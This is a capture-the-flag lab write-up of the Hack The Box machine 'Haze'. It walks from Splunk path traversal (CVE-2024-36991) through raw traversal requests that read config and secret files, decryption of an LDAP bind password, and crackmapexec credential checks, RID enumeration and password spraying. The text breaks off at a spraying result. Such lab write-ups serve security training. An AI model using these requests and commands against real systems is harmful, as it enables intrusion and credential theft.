🧠 HTB Write-Up: Haze

Difficulty: Hard
OS: Linux
Points: 30
Date: 2025-04-07

🔍 Reconnaissance

🔎 Nmap Scan Results

Command Used:

nmap -sV -sC 10.xx.xx.xx -v

Target Host: 10.xx.xx.xx (dc01.haze.htb)
Host OS: Likely Windows Server (Domain Controller)

🟢 Open Ports and Services:

🧠 Observations:

• This host is a Windows Active Directory Domain Controller (dc01.haze.htb)

• Multiple LDAP/Kerberos services confirm AD environment

• Splunk appears to be running on ports 8000, 8088, and 8089

• Identified Splunk Version 9.2.1 via port 8089:

🌐 Enumeration

🔹 Interface Access

• Navigated to: http://haze.htb:8000 → Splunk Web Login Page
• Splunk Management available on:
  • https://haze.htb:8088
  • https://haze.htb:8089

⚠️ Vulnerability Identified

• CVE-2024-36991 – Path Traversal in Splunk

  • Affects versions < 9.2.2 (Windows)
  • Exploitable via /modules/messaging/ endpoint
  • Allows arbitrary file read on the host

• 🔗 NVD Entry

• 🔗 PoC Exploit GitHub

📸 PoC Search on GitHub:

🧪 Exploit Usage

python CVE-2024-36991.py -u http://haze.htb:8000/

[VLUN] Vulnerable: http://haze.htb:8000/
:admin:$6$Ak3m7.aHgb/NOQez$O7C8Ck2lg5RaXJs9FrwPr7xbJBJxMCpqIx3TG30Pvl7JSvv0pn3vtYnt8qF4WhL7hBZygwemqn7PBj5dLBm0D1::Administrator:admin:changeme@example.com:::20152
:edward:$6$3LQHFzfmlpMgxY57$Sk32K6eknpAtcT23h6igJRuM1eCe7WAfygm103cQ22/Niwp1pTCKzc0Ok1qhV25UsoUN4t7HYfoGDb4ZCv8pw1::Edward@haze.htb:user:Edward@haze.htb:::20152
:mark:$6$j4QsAJiV8mLg/bhA$Oa/l2cgCXF8Ux7xIaDe3dMW6.Qfobo0PtztrVMHZgdGa1j8423jUvMqYuqjZa/LPd.xryUwe699/8SgNC6v2H/:::user:Mark@haze.htb:::20152
:paul:$6$Y5ds8NjDLd7SzOTW$Zg/WOJxk38KtI.ci9RFl87hhWSawfpT6X.woxTvB4rduL4rDKkE.psK7eXm6TgriABAhqdCPI4P0hcB8xz0cd1:::user:paul@haze.htb:::20152

👥 Extracted Usernames (from Splunk config)

From the Splunk path traversal exploit output, the following potential user accounts were identified:

• Edward@haze.htb
• Mark@haze.htb
• paul@haze.htb

🛠️ Continued Exploitation – Splunk File Reads

Since the password hashes could not be cracked, the next logical step was to modify the CVE-2024-36991 exploit to read other sensitive files.

📄 Target: Splunk Configuration File

Goal: Identify Splunk’s installation path and pivot to read additional files.

Exploitation Path Used:

.../Program%20Files/Splunk/etc/splunk-launch.conf

📄 Read: splunk-launch.conf

File Content:

# Version 9.2.1
# Modify the following line to suit the location of your Splunk install.
# If unset, Splunk will use the parent of the directory containing the splunk CLI executable.

SPLUNK_HOME=C:\Program Files\Splunk

# By default, Splunk stores its indexes under SPLUNK_HOME in the var\lib\splunk subdirectory.
# This can be overridden here:
# SPLUNK_DB=C:\builds\splcore\main\build_home\splunk\var\lib\splunk

# Splunkd service name
SPLUNK_SERVER_NAME=Splunkd

PYTHONHTTPSVERIFY=0
PYTHONUTF8=1

📄 Read: authentication.conf

Request Used:

GET /en-US/modules/messaging/C%3A../C%3A../C%3A../C%3A../C%3A../etc/system/local/authentication.conf HTTP/1.1
Host: dc01.haze.htb:8000

[splunk_auth]
minPasswordLength = 8
minPasswordUppercase = 0
minPasswordLowercase = 0
minPasswordSpecial = 0
minPasswordDigit = 0

[Haze LDAP Auth]
SSLEnabled = 0
anonymous_referrals = 1
bindDN = CN=Paul Taylor,CN=Users,DC=haze,DC=htb
bindDNpassword = $7$ndnYiCPhf4lQgPhPu7Yz1pvGm66Nk0PpYcLN+qt1qyojg4QU+hKteemWQGUuTKDVlWbO8pY=
host = dc01.haze.htb
port = 389
userBaseDN = CN=Users,DC=haze,DC=htb
userNameAttribute = samaccountname

Key Findings:

• LDAP Auth Enabled (authType = LDAP)

• Bind DN: CN=Paul Taylor,CN=Users,DC=haze,DC=htb

• Encrypted Password

📄 Read: splunk.secret

To decrypt the LDAP bind password (bindDNpassword), Splunk uses a master key stored in splunk.secret.

Request Used:

GET /en-US/modules/messaging/C%3A../C%3A../C%3A../C%3A../C%3A../etc/auth/splunk.secret HTTP/1.1
Host: dc01.haze.htb:8000

NfKeJCdFGKUQUqyQmnX/WM9xMn5uVF32qyiofYPHkEOGcpMsEN.lRPooJnBdEL5Gh2wm12jKEytQoxsAYA5mReU9.h0SYEwpFMDyyAuTqhnba9P2Kul0dyBizLpq6Nq5qiCTBK3UM516vzArIkZvWQLk3Bqm1YylhEfdUvaw1ngVqR1oRtg54qf4jG0X16hNDhXokoyvgb44lWcH33FrMXxMvzFKd5W3TaAUisO6rnN0xqB7cHbofaA1YV9vgD

📌 Tool Required to Decrypt:
splunksecrets by HurricaneLabs

🔓 Decrypted LDAP Password – Paul Taylor

After retrieving both the encrypted password from authentication.conf and the splunk.secret master key, we successfully decrypted the LDAP credentials for Paul Taylor.

🔐 Ciphertext (from authentication.conf)

$7$ndnYiCPhf4lQgPhPu7Yz1pvGm66Nk0PpYcLN+qt1qyojg4QU+hKteemWQGUuTKDVlWbO8pY=

#### 🧰 Tool Used

- [`splunksecrets`](https://github.com/HurricaneLabs/splunksecrets)
    

#### 🧪 Command Executed

splunksecrets splunk-decrypt -S splunk.secret

✅ Decrypted Result

Ld@p_Auth_Sp1unk@2k24

🎯 Initial Foothold

Used crackmapexec to test the credentials against SMB on the domain controller.

Command:

crackmapexec smb haze.htb -u 'paul.taylor' -p 'Ld@p_Auth_Sp1unk@2k24'
SMB         10.xx.xx.xx   445    DC01             [+] haze.htb\paul.taylor:Ld@p_Auth_Sp1unk@2k24

Confirmed: Credentials are valid for domain user paul.taylor

After confirming access with paul.taylor, we performed RID brute-force enumeration against the Domain Controller to enumerate valid users.

🧪 Command:

crackmapexec smb haze.htb -u 'paul.taylor' -p 'Ld@p_Auth_Sp1unk@2k24' --rid-brute | grep 'SidTypeUser'


500: HAZE\Administrator
501: HAZE\Guest
502: HAZE\krbtgt
1000: HAZE\DC01$
1103: HAZE\paul.taylor
1104: HAZE\mark.adams
1105: HAZE\edward.martin
1106: HAZE\alexander.green
1111: HAZE\Haze-IT-Backup$

You can see that there are several other users

After identifying additional domain users via RID brute-force, we performed password spraying to test for reused credentials.

🧪 Command:

crackmapexec smb haze.htb -u users.txt -p 'Ld@p_Auth_Sp1unk@2k24'

Note: users.txt contains:

mark.adams
edward.martin
alexander.green
Haze-IT-Backup$

✅ Successful Login: